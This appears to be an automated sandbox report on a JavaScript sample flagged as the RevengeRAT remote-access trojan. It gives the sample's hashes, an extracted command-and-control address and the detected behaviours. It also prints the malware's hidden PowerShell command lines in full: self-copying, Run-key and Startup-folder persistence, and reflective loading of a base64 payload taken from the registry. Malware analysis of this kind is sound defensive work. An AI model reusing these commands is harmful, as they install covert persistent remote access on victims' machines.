Analysis
-
max time kernel
141s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
16-10-2024 05:37
Static task
static1
Behavioral task
behavioral1
Sample
d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js
Resource
win10v2004-20241007-en
General
-
Target
d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js
-
Size
60KB
-
MD5
5508be73f4288131312fe9dcbe64322c
-
SHA1
f579ae533109afddd4d9e528c7c393035cd80e7a
-
SHA256
d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd
-
SHA512
0f22d6e8378164326cf1634061281e765b29e3b0bef2eb2f1c3fd30d84a1554233c8b1eb930b6df431e982c0ce46b22f451b491892bc2b1c0a1ae60a66e2356f
-
SSDEEP
768:qze48RhtXFS/81q/y1wGU8a1aIIEHU8aIIFTTV+i2jsm888esI8X88888gKV7+lA:qC48xhtaGcdIh8aIIxgFv
Malware Config
Extracted
revengerat
NyanCatRevenge
54.146.241.16:5222
f9796de67e
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 2 2632 powershell.exe 3 2632 powershell.exe 4 2632 powershell.exe 5 2632 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2716 powershell.exe 2828 powershell.exe 2552 powershell.exe 2632 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\cocacola = "C:\\Users\\Admin\\AppData\\Roaming\\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js" powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2716 powershell.exe 2828 powershell.exe 2552 powershell.exe 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2152 wrote to memory of 2716 2152 wscript.exe 31 PID 2152 wrote to memory of 2716 2152 wscript.exe 31 PID 2152 wrote to memory of 2716 2152 wscript.exe 31 PID 2716 wrote to memory of 2764 2716 powershell.exe 33 PID 2716 wrote to memory of 2764 2716 powershell.exe 33 PID 2716 wrote to memory of 2764 2716 powershell.exe 33 PID 2764 wrote to memory of 2828 2764 wscript.exe 34 PID 2764 wrote to memory of 2828 2764 wscript.exe 34 PID 2764 wrote to memory of 2828 2764 wscript.exe 34 PID 2764 wrote to memory of 2552 2764 wscript.exe 36 PID 2764 wrote to memory of 2552 2764 wscript.exe 36 PID 2764 wrote to memory of 2552 2764 wscript.exe 36 PID 2764 wrote to memory of 2632 2764 wscript.exe 38 PID 2764 wrote to memory of 2632 2764 wscript.exe 38 PID 2764 wrote to memory of 2632 2764 wscript.exe 38
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js1⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js'));wscript 'C:\Users\Admin\AppData\Roaming\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Roaming\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js3⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js' -PropertyType String -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd.js'))"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KK2X576DW6BVHI1PKRXG.temp
Filesize7KB
MD528a91547a923fb82cafce805e4b5bfef
SHA193fe48e8f08066d51c38209b33b6d129e0b65f90
SHA25619403ee7c07468bc1cfcdcb19ddfa14cc86e0f019702a3f56116ae0975eeb4dd
SHA512045b87d67e498800ae057bd08459da2eec5e73eb7aa517613e5c207239f211af08482c7d6f186d01ed094f521ffd391713f1e272ce5ab77a9fe77463c80e4c3d
-
Filesize
60KB
MD55508be73f4288131312fe9dcbe64322c
SHA1f579ae533109afddd4d9e528c7c393035cd80e7a
SHA256d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd
SHA5120f22d6e8378164326cf1634061281e765b29e3b0bef2eb2f1c3fd30d84a1554233c8b1eb930b6df431e982c0ce46b22f451b491892bc2b1c0a1ae60a66e2356f